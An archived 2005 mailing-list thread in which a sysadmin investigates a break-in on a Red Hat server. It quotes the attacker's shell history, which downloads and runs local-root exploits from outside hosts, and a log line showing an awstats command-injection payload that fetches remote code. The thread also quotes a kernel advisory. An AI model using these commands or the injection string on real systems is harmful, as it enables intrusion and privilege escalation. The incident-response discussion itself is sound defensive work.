Patched kernel still vulnerable!? (was Re: Hacked...)

[Aviram Carmi <avi-redhat otn com>]

Hi all,

This might not apply to RHEL 4, as the machine in question is still 
running RHEL 3 update 4, but just in case this might apply...

As I was tracking down what happened to my machine, I followed up and 
researched the first few commands that were in the .bash_history:

cd /var/tmp
wget http://www.albany-toyota.co.nz/release/elflbl
chmod 777 elflbl
./elflbl
id
./elflbl -n3
id
./elflbl -f switch
id
wget http://www.freewebs.com/swcbreaker/xpl/uselib24
chmod 777 uselib24
./uselib24


From what I was able to find, elflbl exploits a vulnerability in 
uselib which was supposedly fixed in Jan 17, and which I installed on 
Jan 20. first traces of the breakin were in Feb 12 (even though the 
log file shows awstats hacked on Mar 5???)

https://rhn.redhat.com/network/errata/details/index.pxt?eid=2656
>  RHSA-2005:043 - Security Advisory
>
>      * Details
>      * Packages
>      * Affected Systems
>
>  Synopsis
>  Updated kernel packages fix security vulnerabilities
>
>  Issued:	2005-01-17
>  Updated:	2005-01-17
>  Topic
>  Updated kernel packages that fix several security issues in Red Hat
>  Enterprise Linux 3 are now available.
>  Description
>  The Linux kernel handles the basic functions of the operating system.
>
>  This advisory includes fixes for several security issues:
>
>  iSEC Security Research discovered a VMA handling flaw in the uselib(2)
>  system call of the Linux kernel. A local user could make use of this
>  flaw to gain elevated (root) privileges. The Common Vulnerabilities and
>  Exposures project (cve.mitre.org) has assigned the name CAN-2004-1235 to
>  this issue.


So... is there still a security hole in the kernel that elflbl exploits?

I have a copy of the elflbl executable (and of the uselib24) if they 
are not available from the above URLs.

BTW,

I installed mod_security http://www.modsecurity.org/ with rules from 
http://www.gotroot.com/mod_security+rules

and upgraded awsatats to the latest version...

and as I mentioned previously wget, curl, lynx, telnet are all 
aliased to to this little shell script (the originals renamed so I 
can use them in my scripts)

{ echo $0 $* ; echo ps;  ps -egxuwc; echo who; who -aH; echo set; 
set; echo ;  } | mail -s $0 myemail gmail com

so that I am informed of any unauthorized used of wget/curl/lynx/telnet


I still do not have a firewall configured, since I am still not quite 
sure how to allow needed services, for example, I have a backup 
client program (Dantz Retrospect), and a FileMaker Pro server, 
running on the system, which use their well known ports, but when 
doing lsof it show that there are other ports in use by these, so I 
am not sure exactly how to do this... I've asked before, and got some 
answers, but did not really follow up and install/configure the 
firewall...

-avi



At 22:45 -0800 03/08/2005, Aviram Carmi wrote:
>  Thanks,
>
>  it was awstats:
>
>  200.175.36.178 - - [05/Mar/2005:19:48:35 -0800] "GET 
> /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/var/tmp;%20%20wget%20http://paginas.terra.com.br/informatica/swcrew/r0nin%20;echo%20__fim__;echo%20| 
> HTTP/1.1" 200 598 "-" "-"
>
>
>  -avi
>
>
>
>  At 00:28 -0600 03/09/2005, Thomas Cameron wrote:
> >   Look in /var/log/http/*.  I am betting that there is something in 
> > one of the logs (probably error_log) that will catch your eye.
> >
> >   You're running something PHP-ish, aren;t you?  Or maybe awstats?
> >
> >   Thomas

--

Aviram Carmi
Owner
Executive Vice President, Technology

Over TheNet (R)
601 Daily Drive Suite #226                                 
Camarillo, CA 93010-5840

http://www.otn.com/   Building Profitable Web Sites Today
(805) 384-1144 Voice  (805) 384-9111 FAX

(C) Copyright 2004, Over TheNet (R)  All rights reserved.